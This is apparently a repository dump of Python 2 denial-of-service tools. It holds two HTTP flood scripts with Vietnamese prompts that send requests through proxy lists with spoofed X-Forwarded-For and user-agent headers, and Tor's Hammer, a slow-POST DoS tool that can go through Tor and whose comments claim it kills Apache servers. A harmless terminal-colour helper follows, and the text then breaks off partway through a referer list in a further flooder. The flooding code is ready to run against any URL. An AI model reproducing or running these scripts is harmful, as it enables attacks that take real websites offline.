Safari/535.7", 40 | "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5", 41 | "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25", 42 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2", 43 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10", 44 | "Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3", 45 | "Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",] 46 | 47 | def randomIp(): 48 | random.seed() 49 | result = str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) + '.' 50 | result = result + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) 51 | return result 52 | 53 | def randomIpList(): 54 | random.seed() 55 | res = "" 56 | for ip in xrange(random.randint(2, 8)): 57 | res = res + randomIp() + ", " 58 | return res[0:len(res) - 2] 59 | 60 | def randomUserAgent(): 61 | return random.choice(userAgents) 62 | 63 | 64 | 65 | class attacco(threading.Thread): 66 | def run(self): 67 | current = x 68 | 69 | if current < len(listaproxy): 70 | proxy = listaproxy[current].split(':') 71 | else: 72 | proxy = random.choice(listaproxy).split(':') 73 | 74 | useragent = "User-Agent: " + randomUserAgent() + "\r\n" 75 | forward = "X-Forwarded-For: " + randomIpList() + "\r\n" 76 | 77 | httprequest = get_host + useragent + accept + forward + connection + "\r\n" 78 | 79 | while nload: 80 | time.sleep(1) 81 | 82 | while 1: 83 | try: 84 | a = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 85 | a.connect((proxy[0], int(proxy[1]))) 86 | a.send(httprequest) 87 | try: 88 | for i in xrange(3): 89 | a.send(httprequest) 90 | except: 91 | tts = 1 92 | 93 | 94 | except: 95 | proxy = random.choice(listaproxy).split(':') 96 | 97 | 98 | 99 | # gioi thieu 100 | print(" .----. Anonymous Team X - Alexander .----. ") 101 | print(" »------(¯` Ddos/Dos With Proxy List By Alexander ´¯)------»") 102 | 103 | # Site 104 | url = raw_input("Trang Web: ") 105 | host_url = url.replace("http://", "").replace("https://", "").split('/')[0] 106 | 107 | #Proxy 108 | in_file = open(raw_input("Proxy: "),"r") 109 | proxyf = in_file.read() 110 | in_file.close() 111 | 112 | 113 | listaproxy = proxyf.split('\n') 114 | 115 | #So luong 116 | thread = input("So luong (1000): ") 117 | 118 | 119 | 120 | get_host = "GET " + url + " HTTP/1.1\r\nHost: " + host_url + "\r\n" 121 | accept = "Accept-Encoding: gzip, deflate\r\n" 122 | 123 | 124 | connection = "Connection: Keep-Alive, Persist\r\nProxy-Connection: keep-alive\r\n" 125 | 126 | 127 | 128 | nload = 1 129 | 130 | 131 | x = 0 132 | 133 | 134 | for x in xrange(thread): 135 | attacco().start() 136 | time.sleep(0.003) 137 | print "Dang chuan bi luong Ddos " + str(x) + "!" 138 | 139 | print "Dang Bat Dau Tan Cong..." 140 | 141 | 142 | nload = 0 143 | 144 | 145 | while not nload: 146 | time.sleep(1) -------------------------------------------------------------------------------- /Monteam.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding: utf8 3 | 4 | import random 5 | import socket 6 | import threading 7 | import time 8 | 9 | userAgents = ["Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", 10 | "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", 11 | "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5", 12 | "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5", 13 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3", 14 | "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0", 15 | "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0", 16 | "Mozilla/5.0 (X11; OpenBSD amd64; rv:28.0) Gecko/20100101 Firefox/28.0", 17 | "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0", 18 | "Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3", 19 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:25.0) Gecko/20100101 Firefox/25.0", 20 | "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0", 21 | "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))", 22 | "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)", 23 | "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)", 24 | "Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)", 25 | "Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00", 26 | "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14", 27 | "Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14", 28 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14", 29 | "Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02", 30 | "Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00", 31 | "Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00", 32 | "Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)", 33 | "HTC_Touch_3G Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)", 34 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0; Nokia;N70)", 35 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+", 36 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+", 37 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.115 Mobile Safari/534.11+", 38 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+", 39 | "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7", 40 | "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5", 41 | "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25", 42 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2", 43 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10", 44 | "Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3", 45 | "Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",] 46 | 47 | def randomIp(): 48 | random.seed() 49 | result = str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) + '.' 50 | result = result + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) 51 | return result 52 | 53 | def randomIpList(): 54 | random.seed() 55 | res = "" 56 | for ip in xrange(random.randint(2, 8)): 57 | res = res + randomIp() + ", " 58 | return res[0:len(res) - 2] 59 | 60 | def randomUserAgent(): 61 | return random.choice(userAgents) 62 | 63 | 64 | 65 | class attacco(threading.Thread): 66 | def run(self): 67 | current = x 68 | 69 | if current < len(listaproxy): 70 | proxy = listaproxy[current].split(':') 71 | else: 72 | proxy = random.choice(listaproxy).split(':') 73 | 74 | useragent = "User-Agent: " + randomUserAgent() + "\r\n" 75 | forward = "X-Forwarded-For: " + randomIpList() + "\r\n" 76 | 77 | httprequest = get_host + useragent + accept + forward + connection + "\r\n" 78 | 79 | while nload: 80 | time.sleep(1) 81 | 82 | while 1: 83 | try: 84 | a = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 85 | a.connect((proxy[0], int(proxy[1]))) 86 | a.send(httprequest) 87 | try: 88 | for i in xrange(3): 89 | a.send(httprequest) 90 | except: 91 | tts = 1 92 | 93 | 94 | except: 95 | proxy = random.choice(listaproxy).split(':') 96 | 97 | 98 | 99 | # gioi thieu 100 | print(" .----. ~MON team - KymljnkII~ .----. ") 101 | print("»------(¯` Ddos/Dr-Ddos With Proxy List By MON team ´¯)------»") 102 | print("contact us : https://www.facebook.com/Kym.Ljnk.II ") 103 | print("We Are MON team - The best group") 104 | 105 | # Site 106 | url = raw_input("Trang Web: ") 107 | host_url = url.replace("http://", "").replace("https://", "").split('/')[0] 108 | 109 | #Proxy 110 | in_file = open(raw_input("Proxy: "),"r") 111 | proxyf = in_file.read() 112 | in_file.close() 113 | 114 | 115 | listaproxy = proxyf.split('\n') 116 | 117 | #So luong 118 | thread = input("So luong (1000): ") 119 | 120 | 121 | 122 | get_host = "GET " + url + " HTTP/1.1\r\nHost: " + host_url + "\r\n" 123 | accept = "Accept-Encoding: gzip, deflate\r\n" 124 | 125 | 126 | connection = "Connection: Keep-Alive, Persist\r\nProxy-Connection: keep-alive\r\n" 127 | 128 | 129 | 130 | nload = 1 131 | 132 | 133 | x = 0 134 | 135 | 136 | for x in xrange(thread): 137 | attacco().start() 138 | time.sleep(0.003) 139 | print "Power = " + str(x) + "!" 140 | 141 | print "Attacking..." 142 | 143 | 144 | nload = 0 145 | 146 | 147 | while not nload: 148 | time.sleep(1) -------------------------------------------------------------------------------- /torshammer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # this assumes you have the socks.py (http://phiral.net/socks.py) 4 | # and terminal.py (http://phiral.net/terminal.py) in the 5 | # same directory and that you have tor running locally 6 | # on port 9050. run with 128 to 256 threads to be effective. 7 | # kills apache 1.X with ~128, apache 2.X / IIS with ~256 8 | # not effective on nginx 9 | 10 | import os 11 | import re 12 | import time 13 | import sys 14 | import random 15 | import math 16 | import getopt 17 | import socks 18 | import string 19 | import terminal 20 | 21 | from threading import Thread 22 | 23 | global stop_now 24 | global term 25 | 26 | stop_now = False 27 | term = terminal.TerminalController() 28 | 29 | useragents = [ 30 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)", 31 | "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)", 32 | "Googlebot/2.1 (http://www.googlebot.com/bot.html)", 33 | "Opera/9.20 (Windows NT 6.0; U; en)", 34 | "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)", 35 | "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)", 36 | "Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0", 37 | "Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16", 38 | "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)", # maybe not 39 | "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13" 40 | "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)", 41 | "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)", 42 | "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)", 43 | "Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)", 44 | "Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)", 45 | "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8", 46 | "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7", 47 | "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", 48 | "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)", 49 | "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)" 50 | ] 51 | 52 | class httpPost(Thread): 53 | def __init__(self, host, port, tor): 54 | Thread.__init__(self) 55 | self.host = host 56 | self.port = port 57 | self.socks = socks.socksocket() 58 | self.tor = tor 59 | self.running = True 60 | 61 | def _send_http_post(self, pause=10): 62 | global stop_now 63 | 64 | self.socks.send("POST / HTTP/1.1\r\n" 65 | "Host: %s\r\n" 66 | "User-Agent: %s\r\n" 67 | "Connection: keep-alive\r\n" 68 | "Keep-Alive: 900\r\n" 69 | "Content-Length: 10000\r\n" 70 | "Content-Type: application/x-www-form-urlencoded\r\n\r\n" % 71 | (self.host, random.choice(useragents))) 72 | 73 | for i in range(0, 9999): 74 | if stop_now: 75 | self.running = False 76 | break 77 | p = random.choice(string.letters+string.digits) 78 | print term.BOL+term.UP+term.CLEAR_EOL+"Posting: %s" % p+term.NORMAL 79 | self.socks.send(p) 80 | time.sleep(random.uniform(0.1, 3)) 81 | 82 | self.socks.close() 83 | 84 | def run(self): 85 | while self.running: 86 | while self.running: 87 | try: 88 | if self.tor: 89 | self.socks.setproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050) 90 | self.socks.connect((self.host, self.port)) 91 | print term.BOL+term.UP+term.CLEAR_EOL+"Connected to host..."+ term.NORMAL 92 | break 93 | except Exception, e: 94 | if e.args[0] == 106 or e.args[0] == 60: 95 | break 96 | print term.BOL+term.UP+term.CLEAR_EOL+"Error connecting to host..."+ term.NORMAL 97 | time.sleep(1) 98 | continue 99 | 100 | while self.running: 101 | try: 102 | self._send_http_post() 103 | except Exception, e: 104 | if e.args[0] == 32 or e.args[0] == 104: 105 | print term.BOL+term.UP+term.CLEAR_EOL+"Thread broken, restarting..."+ term.NORMAL 106 | self.socks = socks.socksocket() 107 | break 108 | time.sleep(0.1) 109 | pass 110 | 111 | def usage(): 112 | print "./torshammer.py -t [-r -p -T -h]" 113 | print " -t|--target " 114 | print " -r|--threads Defaults to 256" 115 | print " -p|--port Defaults to 80" 116 | print " -T|--tor Enable anonymising through tor on 127.0.0.1:9050" 117 | print " -h|--help Shows this help\n" 118 | print "Eg. ./torshammer.py -t 192.168.1.100 -r 256\n" 119 | 120 | def main(argv): 121 | 122 | try: 123 | opts, args = getopt.getopt(argv, "hTt:r:p:", ["help", "tor", "target=", "threads=", "port="]) 124 | except getopt.GetoptError: 125 | usage() 126 | sys.exit(-1) 127 | 128 | global stop_now 129 | 130 | target = '' 131 | threads = 256 132 | tor = False 133 | port = 80 134 | 135 | for o, a in opts: 136 | if o in ("-h", "--help"): 137 | usage() 138 | sys.exit(0) 139 | if o in ("-T", "--tor"): 140 | tor = True 141 | elif o in ("-t", "--target"): 142 | target = a 143 | elif o in ("-r", "--threads"): 144 | threads = int(a) 145 | elif o in ("-p", "--port"): 146 | port = int(a) 147 | 148 | if target == '' or int(threads) <= 0: 149 | usage() 150 | sys.exit(-1) 151 | 152 | print term.DOWN + term.RED + "/*" + term.NORMAL 153 | print term.RED + " * Target: %s Port: %d" % (target, port) + term.NORMAL 154 | print term.RED + " * Threads: %d Tor: %s" % (threads, tor) + term.NORMAL 155 | print term.RED + " * Give 20 seconds without tor or 40 with before checking site" + term.NORMAL 156 | print term.RED + " */" + term.DOWN + term.DOWN + term.NORMAL 157 | 158 | rthreads = [] 159 | for i in range(threads): 160 | t = httpPost(target, port, tor) 161 | rthreads.append(t) 162 | t.start() 163 | 164 | while len(rthreads) > 0: 165 | try: 166 | rthreads = [t.join(1) for t in rthreads if t is not None and t.isAlive()] 167 | except KeyboardInterrupt: 168 | print "\nShutting down threads...\n" 169 | for t in rthreads: 170 | stop_now = True 171 | t.running = False 172 | 173 | if __name__ == "__main__": 174 | print "\n/*" 175 | print " *"+term.RED + " Tor's Hammer "+term.NORMAL 176 | print " * Slow POST DoS Testing Tool" 177 | print " * entropy [at] phiral.net" 178 | print " * Anon-ymized via Tor" 179 | print " * We are Legion." 180 | print " */\n" 181 | 182 | main(sys.argv[1:]) 183 | 184 | -------------------------------------------------------------------------------- /terminal.py: -------------------------------------------------------------------------------- 1 | import sys, re 2 | 3 | class TerminalController: 4 | """ 5 | A class that can be used to portably generate formatted output to 6 | a terminal. 7 | 8 | `TerminalController` defines a set of instance variables whose 9 | values are initialized to the control sequence necessary to 10 | perform a given action. These can be simply included in normal 11 | output to the terminal: 12 | 13 | >>> term = TerminalController() 14 | >>> print 'This is '+term.GREEN+'green'+term.NORMAL 15 | 16 | Alternatively, the `render()` method can used, which replaces 17 | '${action}' with the string required to perform 'action': 18 | 19 | >>> term = TerminalController() 20 | >>> print term.render('This is ${GREEN}green${NORMAL}') 21 | 22 | If the terminal doesn't support a given action, then the value of 23 | the corresponding instance variable will be set to ''. As a 24 | result, the above code will still work on terminals that do not 25 | support color, except that their output will not be colored. 26 | Also, this means that you can test whether the terminal supports a 27 | given action by simply testing the truth value of the 28 | corresponding instance variable: 29 | 30 | >>> term = TerminalController() 31 | >>> if term.CLEAR_SCREEN: 32 | ... print 'This terminal supports clearning the screen.' 33 | 34 | Finally, if the width and height of the terminal are known, then 35 | they will be stored in the `COLS` and `LINES` attributes. 36 | """ 37 | # Cursor movement: 38 | BOL = '' #: Move the cursor to the beginning of the line 39 | UP = '' #: Move the cursor up one line 40 | DOWN = '' #: Move the cursor down one line 41 | LEFT = '' #: Move the cursor left one char 42 | RIGHT = '' #: Move the cursor right one char 43 | 44 | # Deletion: 45 | CLEAR_SCREEN = '' #: Clear the screen and move to home position 46 | CLEAR_EOL = '' #: Clear to the end of the line. 47 | CLEAR_BOL = '' #: Clear to the beginning of the line. 48 | CLEAR_EOS = '' #: Clear to the end of the screen 49 | 50 | # Output modes: 51 | BOLD = '' #: Turn on bold mode 52 | BLINK = '' #: Turn on blink mode 53 | DIM = '' #: Turn on half-bright mode 54 | REVERSE = '' #: Turn on reverse-video mode 55 | NORMAL = '' #: Turn off all modes 56 | 57 | # Cursor display: 58 | HIDE_CURSOR = '' #: Make the cursor invisible 59 | SHOW_CURSOR = '' #: Make the cursor visible 60 | 61 | # Terminal size: 62 | COLS = None #: Width of the terminal (None for unknown) 63 | LINES = None #: Height of the terminal (None for unknown) 64 | 65 | # Foreground colors: 66 | BLACK = BLUE = GREEN = CYAN = RED = MAGENTA = YELLOW = WHITE = '' 67 | 68 | # Background colors: 69 | BG_BLACK = BG_BLUE = BG_GREEN = BG_CYAN = '' 70 | BG_RED = BG_MAGENTA = BG_YELLOW = BG_WHITE = '' 71 | 72 | _STRING_CAPABILITIES = """ 73 | BOL=cr UP=cuu1 DOWN=cud1 LEFT=cub1 RIGHT=cuf1 74 | CLEAR_SCREEN=clear CLEAR_EOL=el CLEAR_BOL=el1 CLEAR_EOS=ed BOLD=bold 75 | BLINK=blink DIM=dim REVERSE=rev UNDERLINE=smul NORMAL=sgr0 76 | HIDE_CURSOR=cinvis SHOW_CURSOR=cnorm""".split() 77 | _COLORS = """BLACK BLUE GREEN CYAN RED MAGENTA YELLOW WHITE""".split() 78 | 79 | def __init__(self, term_stream=sys.stdout): 80 | """ 81 | Create a `TerminalController` and initialize its attributes 82 | with appropriate values for the current terminal. 83 | `term_stream` is the stream that will be used for terminal 84 | output; if this stream is not a tty, then the terminal is 85 | assumed to be a dumb terminal (i.e., have no capabilities). 86 | """ 87 | # Curses isn't available on all platforms 88 | try: import curses 89 | except: return 90 | 91 | # If the stream isn't a tty, then assume it has no capabilities. 92 | if not term_stream.isatty(): return 93 | 94 | # Check the terminal type. If we fail, then assume that the 95 | # terminal has no capabilities. 96 | try: curses.setupterm() 97 | except: return 98 | 99 | # Look up numeric capabilities. 100 | self.COLS = curses.tigetnum('cols') 101 | self.LINES = curses.tigetnum('lines') 102 | 103 | # Look up string capabilities. 104 | for capability in self._STRING_CAPABILITIES: 105 | (attrib, cap_name) = capability.split('=') 106 | setattr(self, attrib, self._tigetstr(cap_name) or '') 107 | 108 | # Colors 109 | set_fg = self._tigetstr('setf') 110 | if set_fg: 111 | for i,color in zip(range(len(self._COLORS)), self._COLORS): 112 | setattr(self, color, curses.tparm(set_fg, i) or '') 113 | set_bg = self._tigetstr('setb') 114 | if set_bg: 115 | for i,color in zip(range(len(self._COLORS)), self._COLORS): 116 | setattr(self, 'BG_'+color, curses.tparm(set_bg, i) or '') 117 | 118 | def _tigetstr(self, cap_name): 119 | # String capabilities can include "delays" of the form "$<2>". 120 | # For any modern terminal, we should be able to just ignore 121 | # these, so strip them out. 122 | import curses 123 | cap = curses.tigetstr(cap_name) or '' 124 | return re.sub(r'\$<\d+>[/*]?', '', cap) 125 | 126 | def render(self, template): 127 | """ 128 | Replace each $-substitutions in the given template string with 129 | the corresponding terminal control string (if it's defined) or 130 | '' (if it's not). 131 | """ 132 | return re.sub(r'\$\$|\${\w+}', self._render_sub, template) 133 | 134 | def _render_sub(self, match): 135 | s = match.group() 136 | if s == '$$': return s 137 | else: return getattr(self, s[2:-1]) 138 | 139 | ####################################################################### 140 | # Example use case: progress bar 141 | ####################################################################### 142 | 143 | class ProgressBar: 144 | """ 145 | A 3-line progress bar, which looks like:: 146 | 147 | Header 148 | 20% [===========----------------------------------] 149 | progress message 150 | 151 | The progress bar is colored, if the terminal supports color 152 | output; and adjusts to the width of the terminal. 153 | """ 154 | BAR = '%3d%% ${GREEN}[${BOLD}%s%s${NORMAL}${GREEN}]${NORMAL}\n' 155 | HEADER = '${BOLD}${CYAN}%s${NORMAL}\n\n' 156 | 157 | def __init__(self, term, header): 158 | self.term = term 159 | if not (self.term.CLEAR_EOL and self.term.UP and self.term.BOL): 160 | raise ValueError("Terminal isn't capable enough -- you " 161 | "should use a simpler progress dispaly.") 162 | self.width = self.term.COLS or 75 163 | self.bar = term.render(self.BAR) 164 | self.header = self.term.render(self.HEADER % header.center(self.width)) 165 | self.cleared = 1 #: true if we haven't drawn the bar yet. 166 | self.update(0, '') 167 | 168 | def update(self, percent, message): 169 | if self.cleared: 170 | sys.stdout.write(self.header) 171 | self.cleared = 0 172 | n = int((self.width-10)*percent) 173 | sys.stdout.write( 174 | self.term.BOL + self.term.UP + self.term.CLEAR_EOL + 175 | (self.bar % (100*percent, '='*n, '-'*(self.width-10-n))) + 176 | self.term.CLEAR_EOL + message.center(self.width)) 177 | 178 | def clear(self): 179 | if not self.cleared: 180 | sys.stdout.write(self.term.BOL + self.term.CLEAR_EOL + 181 | self.term.UP + self.term.CLEAR_EOL + 182 | self.term.UP + self.term.CLEAR_EOL) 183 | self.cleared = 1 184 | 185 | 186 | -------------------------------------------------------------------------------- /kit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #coding: utf-8 3 | #coder by Phuoc Thanh 4 | import sys 5 | import random 6 | import socket 7 | import threading 8 | import time 9 | import datetime 10 | import urllib 11 | #GET USER-AGENT 12 | def getUserAgent(): 13 | platform = random.choice(['Macintosh', 'Windows', 'X11']) 14 | if platform == 'Macintosh': 15 | os = random.choice(['68K', 'PPC']) 16 | elif platform == 'Windows': 17 | os = random.choice(['Win3.11', 'WinNT3.51', 'WinNT4.0', 'Windows NT 5.0', 'Windows NT 5.1', 'Windows NT 5.2', 'Windows NT 6.0', 'Windows NT 6.1', 'Windows NT 6.2', 'Win95', 'Win98', 'Win 9x 4.90', 'WindowsCE', 'Windows 7', 'Windows 8']) 18 | elif platform == 'X11': 19 | os = random.choice(['Linux i686', 'Linux x86_64']) 20 | browser = random.choice(['chrome', 'firefox', 'ie']) 21 | if browser == 'chrome': 22 | webkit = str(random.randint(500, 599)) 23 | version = str(random.randint(0, 28)) + '.0' + str(random.randint(0, 1500)) + '.' + str(random.randint(0, 999)) 24 | return 'Mozilla/5.0 (' + os + ') AppleWebKit/' + webkit + '.0 (KHTML, like Gecko) Chrome/' + version + ' Safari/' + webkit 25 | elif browser == 'firefox': 26 | currentYear = datetime.date.today().year 27 | year = str(random.randint(2000, currentYear)) 28 | month = random.randint(1, 12) 29 | if month < 10: 30 | month = '0' + str(month) 31 | else: 32 | month = str(month) 33 | day = random.randint(1, 30) 34 | if day < 10: 35 | day = '0' + str(day) 36 | else: 37 | day = str(day) 38 | gecko = year + month + day 39 | version = str(random.randint(1, 21)) + '.0' 40 | return 'Mozilla/5.0 (' + os + '; rv:' + version + ') Gecko/' + gecko + ' Firefox/' + version 41 | elif browser == 'ie': 42 | version = str(random.randint(1, 10)) + '.0' 43 | engine = str(random.randint(1, 5)) + '.0' 44 | option = random.choice([True, False]) 45 | if option == True: 46 | token = random.choice(['.NET CLR', 'SV1', 'Tablet PC', 'Win64; IA64', 'Win64; x64', 'WOW64']) + '; ' 47 | else: 48 | token = '' 49 | return 'Mozilla/5.0 (compatible; MSIE ' + version + '; ' + os + '; ' + token + 'Trident/' + engine + ')' 50 | 51 | reFerers = [ 52 | "https://www.google.com.vn/?gws_rd=ssl#q=", 53 | "http://yandex.ru/yandsearch?text=%D1%%D2%?=g.sql()81%..", 54 | "http://vk.com/profile.php?redirect=", 55 | "http://www.usatoday.com/search/results?q=", 56 | "http://yandex.ru/yandsearch?text=", 57 | "http://go.mail.ru/search?mail.ru=1&q=", 58 | "http://nova.rambler.ru/search?=btnG?=%D0?2?%D0?2?%=D0..", 59 | "http://ru.wikipedia.org/wiki/%D0%9C%D1%8D%D1%x80_%D0%..", 60 | "http://ru.search.yahoo.com/search;_yzt=?=A7x9Q.bs67zf..", 61 | "http://ru.search.yahoo.com/search;?_query?=l%t=?=?A7x..", 62 | "http://go.mail.ru/search?gay.ru.query=1&q=?abc.r..", 63 | "http://nova.rambler.ru/search?btnG=%D0%9D%?D0%B0%D0%B..", 64 | "http://www.google.ru/url?sa=t&rct=?j&q=&e..", 65 | "http://help.baidu.com/searchResult?keywords=", 66 | "http://www.bing.com/search?q=", 67 | "https://www.yandex.com/yandsearch?text=", 68 | "https://duckduckgo.com/?q=", 69 | "http://www.ask.com/web?q=", 70 | "http://search.aol.com/aol/search?q=", 71 | "https://www.om.nl/vaste-onderdelen/zoeken/?zoeken_term=", 72 | "http://validator.w3.org/feed/check.cgi?url=", 73 | "http://host-tracker.com/check_page/?furl=", 74 | "http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL=", 75 | "http://jigsaw.w3.org/css-validator/validator?uri=", 76 | "https://add.my.yahoo.com/rss?url=", 77 | "http://engadget.search.aol.com/search?q=", 78 | "https://steamcommunity.com/market/search?q=", 79 | "http://filehippo.com/search?q=", 80 | "http://www.topsiteminecraft.com/site/pinterest.com/search?q=", 81 | "http://eu.battle.net/wow/en/search?q=", 82 | "http://engadget.search.aol.com/search?q=", 83 | "http://careers.gatesfoundation.org/search?q=", 84 | "http://techtv.mit.edu/search?q=", 85 | "http://www.ustream.tv/search?q=", 86 | "http://www.ted.com/search?q=", 87 | "http://funnymama.com/search?q=", 88 | "http://itch.io/search?q=", 89 | "http://jobs.rbs.com/jobs/search?q=", 90 | "http://taginfo.openstreetmap.org/search?q=", 91 | "http://www.baoxaydung.com.vn/news/vn/search&q=", 92 | "https://play.google.com/store/search?q=", 93 | "http://www.tceq.texas.gov/@@tceq-search?q=", 94 | "http://www.reddit.com/search?q=", 95 | "http://www.bestbuytheater.com/events/search?q=", 96 | "https://careers.carolinashealthcare.org/search?q=", 97 | "http://jobs.leidos.com/search?q=", 98 | "http://jobs.bloomberg.com/search?q=", 99 | "https://www.pinterest.com/search/?q=", 100 | "http://millercenter.org/search?q=", 101 | "https://www.npmjs.com/search?q=", 102 | 